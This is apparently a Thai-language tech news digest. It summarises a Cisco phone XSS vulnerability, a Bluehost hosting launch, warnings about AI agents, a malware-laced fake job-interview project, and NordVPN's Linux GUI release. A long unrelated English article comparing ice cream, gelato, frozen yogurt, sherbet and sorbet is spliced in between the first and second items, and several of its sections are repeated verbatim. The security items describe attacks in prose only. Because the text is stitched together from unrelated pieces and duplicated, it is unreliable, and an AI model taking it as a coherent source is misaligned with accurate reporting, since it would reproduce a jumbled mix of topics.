ต้องเปิด Web Access และลงทะเบียนกับ Cisco Unified Communications Manager เพื่อให้ช่องโหว่ทำงาน
Web Access ถูกปิดเป็นค่าเริ่มต้น ลดความเสี่ยงในระบบทั่วไป
ไม่มี workaround นอกจากการอัปเดต firmware หรือปิด Web Access
ช่องโหว่ CVE-2025-20351 เปิดทางให้โจมตีแบบ XSS ผ่าน web UI
อุปกรณ์ที่ได้รับผลกระทบ ได้แก่ Cisco Desk Phone 9800, IP Phone 7800, 8800, 8821 และ Video Phone 8875
เวอร์ชันที่ปลอดภัย ได้แก่ SIP Software 3.3(1), 14.3(1)SR2, 14.4(1), และ 11.0(6)SR7


https://securityonline.info/cisco-patches-high-severity-cve-2025-20350-dos-flaw-in-desk-and-ip-phones/

Gelato vs. Ice Cream vs. Frozen Yogurt vs. Sherbet vs. Sorbet: Get The Scoop On The Difference

You scream, I scream, we all scream for… wait, is that ice cream or gelato? Or frozen yogurt? And what’s the deal with sherbet and sorbet? Are all of these things ice cream, too?

Don’t get a brain freeze. We’ll break down the similarities and technical differences between these frozen treats—based on ingredients and how they’re made—in addition to dipping into the overlap of the terms in casual use.

Join as we serve up the answers to these questions and more:

What defines ice cream?
What is the difference between gelato and ice cream?
How is ice cream different from frozen yogurt?
Is sherbet a kind of ice cream?
What is the difference between sherbet and sorbet?
How is gelato different from sorbet?
What is the difference between sorbet and ice cream?

Quick summary

We casually call a lot of frozen treats ice cream. But according to US technical guidelines, ice cream must contain 10 percent milk fat. It’s typically made with milk, cream, flavorings, and sometimes egg yolk. Gelato is similar to ice cream but typically contains less cream and air. Frozen yogurt uses yogurt as its primary ingredient rather than milk and cream. Unlike ice cream, sherbet uses fruit juice or fruit purée as its main ingredient and typically only has a small amount of dairy. Sorbet also uses fruit juice or purée as its main ingredient, but it doesn’t contain any dairy products or eggs.

What is the difference between gelato and ice cream?

Generally, the term ice cream refers to a creamy frozen dessert that’s made with dairy fats, sugar, and sometimes egg yolks. However, ice cream is often casually used as a catchall term to refer to all kinds of frozen desserts, including many of the ones that we’ll compare here, some of which do not contain cream or any dairy products.

That being said, the definition of ice cream is often much more narrow in technical use. In fact, according to US law, in order for a food to be considered ice cream in the US it must contain at least 10 percent milk fat. The legal definition also touches on the inclusion of flavoring ingredients like sugar or artificial sweeteners and optional dairy products, such as cream, butter, buttermilk, and skim milk. Typically, egg yolks are also allowed as an ingredient. Ice cream typically contains a lot of cream in order to achieve the required milk fat percentage.

Gelato is an Italian-style dessert that usually contains many of the same ingredients as ice cream. It’s often considered a type of ice cream—sometimes referred to as “Italian ice cream.”

Compared to ice cream, though, gelato usually contains less cream and has a lower milk fat percentage. Additionally, the slower churning process of gelato causes it to be infused with less air than ice cream. All of this means that gelato tends to have a silkier texture than ice cream.

frozen yogurt vs. ice cream

Frozen yogurt (popularly nicknamed fro-yo) and ice cream are both typically made from dairy products and sugar. However, the main ingredients in ice cream are milk and cream and the main ingredient in frozen yogurt is, unsurprisingly, yogurt. Under certain technical requirements, ice cream must have at least 10 percent milk fat, but those requirements don’t apply to frozen yogurt. The fat percentage of frozen yogurt depends on what type of milk was used to make the yogurt in it.

Is sherbet ice cream?

Sherbet is a creamy frozen dessert made mainly from fruit juice or fruit purée—it typically contains only small amounts of dairy products, egg whites, and/or gelatin. (Sherbet is pronounced [ shur-bit ], but many people say [ shur-burt ], leading to spelling sherbert becoming increasingly common.)

Sherbet is technically not ice cream, even though they both can contain fruit and dairy products. The big difference is that sherbet’s main ingredient is fruit juice or purée, while ice cream’s main ingredients are typically milk and cream. Still, they’re close enough that many people likely consider sherbet a type of ice cream.

sherbet vs. sorbet

As we just learned, sherbet typically contains only a small amount of dairy products and/or eggs. Sorbet (pronounced [ sawr-bey ]) is a creamy frozen concoction made from fruit juice or fruit purée that does not contain any dairy products or eggs. Sorbet is usually a dessert, but not always—it’s sometimes served between courses as a palate cleanser.

The words look similar because they’re ultimately based on the same root—the Turkish şerbet, from the Persian sharbat, from the Arabic sharbah, meaning “a drink.”

gelato vs. sorbet

By now, you know that gelato traditionally uses milk and cream as its main ingredients, and that sorbet primarily contains fruit juice or fruit purée and does not use dairy products or eggs. Sorbet is less creamy.

sorbet vs. ice cream

The difference between ice cream and sorbet is also based on whether or not dairy is used. Technically speaking, ice cream always contains cream and/or milk as its main ingredients, while sorbet traditionally never includes dairy or eggs, instead being primarily made from fruit juice or fruit purée.

sherbet vs. sorbet

As we just learned, sherbet typically contains only a small amount of dairy products and/or eggs. Sorbet (pronounced [ sawr-bey ]) is a creamy frozen concoction made from fruit juice or fruit purée that does not contain any dairy products or eggs. Sorbet is usually a dessert, but not always—it’s sometimes served between courses as a palate cleanser.

The words look similar because they’re ultimately based on the same root—the Turkish şerbet, from the Persian sharbat, from the Arabic sharbah, meaning “a drink.”

gelato vs. sorbet

By now, you know that gelato traditionally uses milk and cream as its main ingredients, and that sorbet primarily contains fruit juice or fruit purée and does not use dairy products or eggs. Sorbet is less creamy.

sorbet vs. ice cream

The difference between ice cream and sorbet is also based on whether or not dairy is used. Technically speaking, ice cream always contains cream and/or milk as its main ingredients, while sorbet traditionally never includes dairy or eggs, instead being primarily made from fruit juice or fruit purée.

Get the inside scoop

Here’s the final scoop: All of these distinctions are traditional and technical. As more dairy-free options become available, you’re much more likely to see many of these names applied to frozen desserts that include some nontraditional ingredients. In the case of ice cream, for example, fat sources used for the base may include ingredients like coconut milk, oat milk, or avocado.

สงวนลิขสิทธิ์ © 2025 AAKKHRA & Co.

“Bluehost เปิดตัวบริการโฮสติ้งใหม่ ลดเวลาโหลดเว็บเพื่ออันดับที่ดีขึ้นบน Google” — โครงสร้างพื้นฐานระดับโลกเพื่อธุรกิจขนาดเล็กที่ต้องการความเร็ว

Bluehost ผู้ให้บริการเว็บโฮสติ้งชื่อดังเปิดตัวบริการใหม่ที่เน้น “Ultra-Low Latency” หรือความหน่วงต่ำเป็นพิเศษ เพื่อช่วยให้เว็บไซต์โหลดเร็วขึ้นและมีโอกาสอันดับดีขึ้นบน Google โดยเฉพาะสำหรับผู้ประกอบการรายย่อยและธุรกิจขนาดกลาง

บริการใหม่นี้มาพร้อมการขยายศูนย์ข้อมูลไปยัง 7 เมืองหลักทั่วโลก ได้แก่ Frankfurt, Mumbai, São Paulo, Paris, Sydney, London และ Madrid ซึ่งช่วยให้เซิร์ฟเวอร์อยู่ใกล้ผู้ใช้งานมากขึ้น ลดเวลาโหลดหน้าเว็บและเพิ่มความเสถียร

Bluehost อ้างว่าโครงสร้างพื้นฐานใหม่นี้สามารถลด latency ได้ถึง 120 มิลลิวินาที และเพิ่มความเร็วในการโหลดหน้าเว็บได้ 2–3 เท่าจากค่าเฉลี่ยอุตสาหกรรม โดยเฉพาะในภูมิภาคยุโรปและเอเชีย

ผลการทดสอบภายในยังพบว่าเว็บไซต์ที่ใช้ WordPress บนเซิร์ฟเวอร์ของ Bluehost โหลดเร็วกว่าเว็บคู่แข่งถึง 3.8 เท่า ซึ่งอาจส่งผลต่ออัตราการมีส่วนร่วมของผู้ใช้และการแปลงยอดขาย

Bluehost ยังอ้างอิงงานวิจัย “Milliseconds Make Millions” โดย Deloitte และ Google ที่พบว่า การปรับความเร็วเพียง 0.1 วินาทีสามารถเพิ่มอัตราการแปลงยอดขายและลด bounce rate ได้อย่างมีนัยสำคัญ

แม้ความเร็วจะเป็นปัจจัยหนึ่งในการจัดอันดับของ Google แต่ยังมีองค์ประกอบอื่นที่สำคัญ เช่น คุณภาพเนื้อหา ความเข้ากันได้กับมือถือ และการเข้าถึงสำหรับผู้พิการ

บริการใหม่นี้ยังมาพร้อมระบบ failover และ replication เฉพาะภูมิภาค เพื่อให้ uptime สูงถึง 99.99% และรองรับการกู้คืนจากภัยพิบัติ

ข้อมูลในข่าว
Bluehost เปิดตัวบริการโฮสติ้งแบบ Ultra-Low Latency
ขยายศูนย์ข้อมูลไปยัง 7 เมืองหลักทั่วโลก
ลด latency ได้ถึง 120 มิลลิวินาที
เพิ่มความเร็วโหลดหน้าเว็บ 2–3 เท่าจากค่าเฉลี่ยอุตสาหกรรม
WordPress บน Bluehost โหลดเร็วกว่าเว็บคู่แข่งถึง 3.8 เท่า
อ้างอิงงานวิจัย “Milliseconds Make Millions” โดย Deloitte และ Google
ความเร็วช่วยเพิ่มอัตราการแปลงยอดขายและลด bounce rate
Google แนะนำให้โหลดเนื้อหาหลักภายใน 2.5 วินาที และตอบสนองภายใน 200 มิลลิวินาที
ระบบใหม่มี failover และ replication เฉพาะภูมิภาค
รับประกัน uptime สูงถึง 99.99% และรองรับ disaster recovery

คำเตือนจากข้อมูลข่าว
ความเร็วเว็บไม่ใช่ปัจจัยเดียวในการจัดอันดับบน Google
หากเนื้อหาไม่ดีหรือไม่เหมาะกับมือถือ อันดับก็อาจไม่ดีขึ้น
การใช้บริการโฮสติ้งระดับสูงอาจมีค่าใช้จ่ายเพิ่ม
การย้ายเว็บไปยังเซิร์ฟเวอร์ใหม่อาจต้องปรับแต่งระบบและโครงสร้างเว็บ
การรับประกัน uptime ไม่ได้หมายถึงไม่มี downtime เลย

https://www.techradar.com/pro/bluehost-debuts-ultra-low-latency-web-hosting-to-help-sites-rank-better-on-google

“AI Agents: อัจฉริยะที่น่าทึ่ง หรือภัยเงียบที่ควบคุมไม่ได้?” — เมื่อผู้ช่วยดิจิทัลกลายเป็นผู้ตัดสินใจแทนมนุษย์

บทความจาก The Star เปิดเผยว่า ปี 2026 กำลังจะกลายเป็น “ปีแห่ง AI Agents” — ระบบปัญญาประดิษฐ์ที่สามารถวางแผนหลายขั้นตอน เข้าถึงบริการดิจิทัล และตัดสินใจแทนผู้ใช้ได้โดยอัตโนมัติ ต่างจากแชตบอทหรือผู้ช่วยเสียงทั่วไปที่แค่ตอบคำถามหรือทำตามคำสั่ง

ผู้พัฒนาเช่น Amazon, Microsoft, Google และ OpenAI ต่างเร่งสร้าง AI Agents ที่สามารถทำงานแทนมนุษย์ได้เกือบทุกอย่าง เช่น สั่งซื้อของออนไลน์ จัดการงาน HR และ IT หรือแม้แต่โทรหาลูกค้าเพื่อเปลี่ยนสินค้าให้โดยไม่ต้องมีมนุษย์เกี่ยวข้อง

Marc Benioff จาก Salesforce เรียกสิ่งนี้ว่า “โมเดลแรงงานใหม่” และคาดว่าจะมีการสร้าง AI Agents กว่า 1 พันล้านตัวภายในปี 2026 ขณะที่ Jensen Huang จาก NVIDIA เชื่อว่าแผนก HR จะรวมเข้ากับ IT เพราะ AI จะจัดการทุกอย่างได้เอง

แต่เสียงเตือนจากนักวิจัยด้านจริยธรรม AI ก็เริ่มดังขึ้น Meredith Whittaker จาก Signal เตือนว่า AI Agents ต้องการสิทธิ์เข้าถึงข้อมูลส่วนตัวอย่างมหาศาล เช่น ปฏิทิน บัตรเครดิต และบัญชีอีเมล โดยไม่ต้องขออนุญาตทุกครั้ง ซึ่งเป็นช่องโหว่ใหญ่ด้านความเป็นส่วนตัว

Yoshua Bengio และ Margaret Mitchell นักวิจัย AI ชื่อดัง เตือนว่า หากปล่อยให้ AI Agents ทำงานโดยไม่มีการควบคุม อาจนำไปสู่การสูญเสียอำนาจของมนุษย์อย่างถาวร และเปิดช่องให้ผู้ไม่หวังดีใช้ระบบเหล่านี้โจมตีหรือสอดแนม

ตัวอย่าง AI Agents ที่มีอยู่แล้ว:
Google: “Project Mariner” ใช้ Gemini 2.0 ทำงานในเบราว์เซอร์แทนมนุษย์
Salesforce: โทรหาลูกค้าอัตโนมัติเพื่อเปลี่ยนสินค้า
DeepL: ใช้ในระบบจัดการบทความ
Microsoft: “Factory Operations Agent” สำหรับปรับปรุงกระบวนการในโรงงาน
Amazon: พัฒนา Alexa ให้รู้จักนิสัยและตารางชีวิตของผู้ใช้
Parloa: AI โทรหาลูกค้าเพื่อเสนออัปเกรดเที่ยวบิน

ข้อมูลในข่าว
AI Agents สามารถวางแผนหลายขั้นตอนและตัดสินใจแทนผู้ใช้ได้
ต่างจากแชตบอททั่วไปที่ทำงานแบบตอบโต้
Amazon, Microsoft, Google, OpenAI และ Salesforce กำลังพัฒนา AI Agents
Salesforce คาดว่าจะมี AI Agents กว่า 1 พันล้านตัวภายในปี 2026
AI Agents สามารถจัดการงาน HR, IT และบริการลูกค้าได้
Google ใช้ Gemini 2.0 ใน “Project Mariner” เพื่อทำงานในเบราว์เซอร์
DeepL มี AI Agent ที่ทำงานในระบบจัดการบทความ
Microsoft มี “Factory Operations Agent” สำหรับโรงงาน
Amazon พัฒนา Alexa ให้รู้จักนิสัยและตารางชีวิตของผู้ใช้
Parloa มี AI ที่โทรหาลูกค้าเพื่อเสนออัปเกรดเที่ยวบิน

คำเตือนจากข้อมูลข่าว
AI Agents ต้องการสิทธิ์เข้าถึงข้อมูลส่วนตัวจำนวนมาก
อาจเข้าถึงบัตรเครดิต ปฏิทิน และอีเมลโดยไม่ขออนุญาตทุกครั้ง
เสี่ยงต่อการถูกโจมตีหรือสอดแนมจากผู้ไม่หวังดี
หากไม่มีการควบคุม อาจนำไปสู่การสูญเสียอำนาจของมนุษย์
การใช้ AI Agents โดยไม่เข้าใจความเสี่ยง อาจสร้างผลกระทบต่อความปลอดภัยสาธารณะ
นักวิจัยเตือนว่า AI Agents อาจกลายเป็นภัยระดับ “catastrophic” หากปล่อยให้เติบโตโดยไม่มีกรอบ

https://www.thestar.com.my/tech/tech-news/2025/10/16/incredibly-dangerous-or-incredibly-useful-the-rise-of-ai-agents

“เกือบโดนแฮกเพราะสมัครงาน” — เมื่อโค้ดทดสอบกลายเป็นกับดักมัลแวร์สุดแนบเนียน

David Dodda นักพัฒนาอิสระเกือบตกเป็นเหยื่อของการโจมตีไซเบอร์ที่แฝงมาในรูปแบบ “สัมภาษณ์งาน” จากบริษัทบล็อกเชนที่ดูน่าเชื่อถือบน LinkedIn ชื่อ Symfa โดยผู้ติดต่อคือ Mykola Yanchii ซึ่งมีโปรไฟล์จริง มีตำแหน่ง Chief Blockchain Officer และมีเครือข่ายมากกว่า 1,000 คน

หลังจากได้รับข้อความเชิญสัมภาษณ์พร้อมโปรเจกต์ทดสอบเป็นโค้ด React/Node บน Bitbucket ที่ดูเป็นมืออาชีพ David เริ่มตรวจสอบและแก้ไขโค้ดตามปกติ แต่ก่อนจะรันคำสั่ง npm start เขาตัดสินใจถาม AI coding assistant ว่ามีโค้ดน่าสงสัยหรือไม่ และนั่นคือจุดที่เขารอดจากการโดนแฮก

ในไฟล์ userController.js มีโค้ด obfuscated ที่จะโหลดมัลแวร์จาก URL ภายนอกและรันด้วยสิทธิ์ระดับเซิร์ฟเวอร์ทันทีที่มีการเข้าถึง route admin โดย payload ที่ถูกโหลดมานั้นสามารถขโมยข้อมูลทุกอย่างในเครื่อง เช่น crypto wallets, credentials และไฟล์ส่วนตัว

ที่น่ากลัวคือ URL ดังกล่าวถูกตั้งให้หมดอายุภายใน 24 ชั่วโมงเพื่อทำลายหลักฐาน และโค้ดถูกฝังอย่างแนบเนียนในฟังก์ชันที่ดูเหมือนปกติ

David สรุปว่า การโจมตีนี้มีความซับซ้อนสูง ใช้ความน่าเชื่อถือจาก LinkedIn, บริษัทจริง, และกระบวนการสัมภาษณ์ที่คุ้นเคยเพื่อหลอกนักพัฒนาให้รันโค้ดอันตรายโดยไม่รู้ตัว

ข้อมูลในข่าว
David ได้รับข้อความจากโปรไฟล์ LinkedIn จริงของ Mykola Yanchii จากบริษัท Symfa
โปรเจกต์ทดสอบเป็นโค้ด React/Node บน Bitbucket ที่ดูน่าเชื่อถือ
โค้ดมีมัลแวร์ฝังอยู่ใน userController.js ที่โหลด payload จาก URL ภายนอก
Payload สามารถขโมยข้อมูลสำคัญในเครื่องได้ทันทีเมื่อรัน
URL ถูกตั้งให้หมดอายุภายใน 24 ชั่วโมงเพื่อทำลายหลักฐาน
การโจมตีใช้ความน่าเชื่อถือจาก LinkedIn และกระบวนการสัมภาษณ์ที่คุ้นเคย
David รอดมาได้เพราะถาม AI assistant ให้ช่วยตรวจสอบก่อนรันโค้ด
โค้ดถูกออกแบบให้รันด้วยสิทธิ์ระดับเซิร์ฟเวอร์ผ่าน route admin
การโจมตีนี้มุ่งเป้าไปที่นักพัฒนาโดยเฉพาะ เพราะเครื่องของ dev มักมีข้อมูลสำคัญ

คำเตือนจากข้อมูลข่าว
การรันโค้ดจากแหล่งที่ไม่รู้จักโดยไม่ sandbox อาจนำไปสู่การโดนแฮก
โปรไฟล์ LinkedIn จริงและบริษัทจริงไม่ได้หมายความว่าโอกาสงานนั้นปลอดภัย
การเร่งให้ผู้สมัครรันโค้ดก่อนสัมภาษณ์เป็นเทคนิคสร้างความเร่งรีบเพื่อให้เผลอ
นักพัฒนามักดาวน์โหลดและรันโค้ดจาก GitHub หรือ Bitbucket โดยไม่ตรวจสอบ
มัลแวร์ฝังในโค้ด server-side สามารถเข้าถึง environment variables และฐานข้อมูล
การโจมตีแบบนี้อาจเจาะระบบ production หรือขโมย crypto wallets ได้ทันที

https://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview

“NordVPN เปิดซอร์ส GUI บน Linux” — พร้อมพลิกแผน Meshnet หลังเสียงเรียกร้องจากผู้ใช้

NordVPN ประกาศเปิดซอร์สโค้ดของแอป GUI สำหรับ Linux อย่างเป็นทางการ พร้อมอัปเดตแพ็กเกจ Snap ให้รวม GUI เข้าไปด้วย ซึ่งถือเป็นก้าวสำคัญในการสนับสนุนความโปร่งใสและการมีส่วนร่วมจากชุมชนโอเพ่นซอร์ส โดยก่อนหน้านี้ NordVPN มีเพียง CLI ที่เปิดซอร์สไว้แล้ว แต่การเปิด GUI ครั้งนี้เกิดขึ้นหลังจากยอดผู้ใช้งานบน Linux เพิ่มขึ้นกว่า 70% ภายใน 100 วันหลังเปิดตัว GUI รุ่นแรก

GUI ที่เปิดซอร์สจะมาพร้อมคำแนะนำในการ build และแนวทางการมีส่วนร่วมบน GitHub โดยยังคงรักษาความปลอดภัยของระบบ VPN หลัก เช่น authentication และ back-end services ไว้เป็นทรัพย์สินของบริษัท เพื่อป้องกันการละเมิดความปลอดภัย

นอกจากนี้ NordVPN ยังกลับลำจากแผนเดิมที่จะยกเลิกฟีเจอร์ Meshnet โดยประกาศว่าจะยังคงให้บริการ Meshnet “แบบเดิมทุกประการ” และมีแผนจะเปิดซอร์ส Meshnet ในอนาคตด้วย ซึ่ง Meshnet เป็นฟีเจอร์ที่ช่วยให้ผู้ใช้สามารถเชื่อมต่ออุปกรณ์ได้สูงสุด 60 เครื่องในเครือข่ายส่วนตัวโดยไม่ต้องผ่านเซิร์ฟเวอร์ของ NordVPN

การตัดสินใจครั้งนี้สะท้อนถึงความตั้งใจของ NordVPN ที่จะฟังเสียงผู้ใช้และสนับสนุนชุมชน Linux อย่างจริงจัง โดย CTO ของบริษัทกล่าวว่า “Linux สร้างขึ้นจากความเปิดกว้างและความร่วมมือของชุมชน เราเองก็ยึดถือค่านิยมเดียวกัน”

ข้อมูลในข่าว
NordVPN เปิดซอร์สโค้ด GUI สำหรับ Linux อย่างเป็นทางการ
อัปเดตแพ็กเกจ Snap ให้รวม GUI เพื่อให้ติดตั้งง่ายขึ้น
ยอดผู้ใช้งาน Linux เพิ่มขึ้นกว่า 70% ภายใน 100 วันหลังเปิดตัว GUI
GUI มาพร้อมคำแนะนำในการ build และเปิดให้ชุมชนร่วมพัฒนา
ระบบ VPN หลัก เช่น authentication และ back-end ยังคงเป็น proprietary
NordVPN กลับลำจากแผนยกเลิก Meshnet หลังเสียงเรียกร้องจากผู้ใช้
Meshnet จะยังคงให้บริการแบบเดิม และมีแผนเปิดซอร์สในอนาคต
Meshnet รองรับการเชื่อมต่ออุปกรณ์สูงสุด 60 เครื่องในเครือข่ายส่วนตัว
CTO ยืนยันค่านิยมของบริษัทสอดคล้องกับชุมชน Linux

คำเตือนจากข้อมูลข่าว
แม้ GUI และ CLI จะเปิดซอร์ส แต่ระบบ VPN หลักยังไม่เปิดเผย
การใช้ Meshnet ต้องระวังเรื่องการตั้งค่าความปลอดภัยระหว่างอุปกรณ์
Snap เป็นเพียงหนึ่งในวิธีติดตั้ง GUI — ผู้ใช้ต้องเลือกวิธีที่เหมาะกับ distro ของตน
การมีส่วนร่วมในโค้ดเปิดซอร์สต้องผ่านการตรวจสอบและปฏิบัติตามแนวทางของบริษัท

https://news.itsfoss.com/nordvpn-linux-app-gui/